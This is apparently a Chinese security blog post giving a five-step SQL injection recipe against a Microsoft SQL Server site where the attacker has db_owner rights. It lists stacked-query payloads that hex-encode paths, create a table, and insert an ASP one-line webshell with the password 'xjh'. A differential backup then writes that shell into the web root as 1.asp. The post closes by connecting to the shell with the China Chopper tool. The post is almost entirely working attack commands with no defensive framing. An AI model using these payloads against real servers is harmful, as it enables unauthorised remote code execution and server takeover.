返回上一层/差异手工备份5步曲

差异手工备份5步曲

2017-11-01 · xiejiahe

当前数据库:wangdachui

权限:DB_OWNER

WEB路径:C:\www\html\

其实就是一种注入的方式去备份

第一步

将数据库名转成16进制变成:0x77616E67646163687569

;declare @a sysname,@s varchar(3000) select @a=db_name(),@s=0x77616E67646163687569 backup database @a to disk=@s--

第二步,删除表 然后再建表

;Drop table [dachui];create table [dbo].[dachui] ([cmd] [image])--

第三步插入一句话木马

;insert into dachui(cmd) values(<%execute request("xjh")%>一句话木马转换为16进制)--

第四步

将备份路径C:\www\html\1.asp转成16进制变成:0x433A77777768746D6C312E617370

;declare @a sysname,@s varchar(3000) select @a=db_name(),@s=0x433A77777768746D6C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

最后一步删除表

;Drop table [dachui]--

中国菜刀连接

http://domain.com/1.asp 密码:xjh
WEB安全
原创文章,转载请注明出处。

ECS云服务器爆款

首购爆款产品低至 0.95

上云优惠聚集地

爆款产品 5 折起